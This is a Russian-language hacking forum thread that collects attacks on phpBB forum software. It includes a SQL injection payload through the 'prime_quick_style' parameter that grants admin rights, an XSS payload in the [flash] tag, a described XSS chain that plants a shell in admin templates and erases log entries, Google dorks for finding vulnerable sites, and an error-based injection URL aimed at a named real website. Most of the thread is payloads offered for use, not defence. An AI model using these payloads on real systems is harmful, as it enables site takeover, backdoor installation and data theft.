|
Цитата:
|
Есть 2 вопроса:
1) с какой версии 2ой ветки в куках перестали храниться хэши? 2) имея куки админа, в админку версии 2.0.23 никак не зайти? ====================== Elekt пишет 1) с 2.0.19 2) в админке толи своя сессия(нужен хсс в админке), толи надо заставить админа залогиниться в админку, тогда сессия облагородится. |
phpBB3 addon prime_quick_style GetAdmin Vulnerability
################################################## ######################## # # phpBB3 addon prime_quick_style GetAdmin Exploit # # Vulnerability found and exploited by -SmoG- # # target file: prime_quick_style.php # # # vuln: POST parameter "prime_quick_style" is injectable. # source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625 # # HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter. # example: prime_quick_style = "5,user_type = 3, user_permissions = ''" # # query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId" # # gratz, now u will be an admin :) # # --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! --- # # # -( by -SmoG- )- ################################################## ######################## # milw0rm.com [2009-09-01] |
Уязвимость: E-Mail send XSRF (CSRF) Vulnerability.
Описание: Собственно, работает лишь в phpbb2, в 3 версии уже закрыта. Эксплойт: Код:
<html> |
Активный межсайтовый скриптинг и автозагрузка шелла в phpBB 3.0.x-3.0.6
1. Активный межсайтовый скриптинг phpBB 3.0.x-3.0.6.
BB-тег [flash] неотфильтрован чуть менее, чем полностью. [flash=1,1]javascript:confirm(/lo/);//lo[/flash] По умолчанию данный тег недоступен для зарегистрированных пользователей, но его можно разрешить для использования в личных сообщениях. Работоспособность : Opera & Safari Но есть ли там ещё XSS? O, да! 2. Автозагрузка шелла/ бэкдора и т.д. через XSS. Для работы скрипта требуется, чтобы администратор был авторизован в админ. панеле. Эксплойт реализует метод, описанный здесь: https://forum.antichat.ru/showpost.php?p=1176333&postcount=36: * Скрипт не станет повторно добавлять php-код, если он уже имеется в шаблоне. * В логе администратора удаляются записи только о произведенных действиях. Шелл будет доступен по адресу: http://vulnsite.xz/forum/ucp.php?mode=login&lo=test Также рекомендуется ознакомиться с этим https://forum.antichat.ru/showpost.php?p=1231741&postcount=37 Эксплойт: Код:
/*/ phpBB 3.0.x-3.0.6 shell-inj. |
Target: phpbb2*
Dork: inurl:"kb.php?mode=cat" Example: Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a)PS: актуально для 4.1<=MySQL=>5 |
Цитата:
Цитата:
|
Версия - 2.x
Может я не увидел, и эта информация где-то должна отображатся, но всё же отпишу. Если у вас есть админка, и вам нужно узнать префикс для заливки шелла, делаем несколько банальных действий. Общие настройки - Резервная копия БД - Копировать только структуру(пташка) - начать копирование, файл скачивается и собственно в нём уже и смотрим префикс. Такая вот маленькая полезность. Может ещё кому пригодится. |
===========================================
PHPBB 3.0.* CMS SQL Injection Vulnerability =========================================== # Exploit Title: PHPBB 3.0.* CMS SQLinjection # Date: 2010-08-27 # Team: eX.ploit ( Abjects #ex.ploit ) # Software Link: http://www.phpbb.com/ # Version: PHPBB3.0.* CMS only (does not work on FORUM only) # Tested on: Linux # Usage: SQLinjection # Gain detailed database information Google dork:[inurl:mypage.php?id= & "Powered by phpBB"] # Tested on:linux/php Url| http://www.website.com/news_view.php?id=1 Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4 # Inj3ct0r.com [2010-08-27] |
так же версию продукта можно определить
forum/styles/prosilver/style.cfg |
| Время: 10:31 |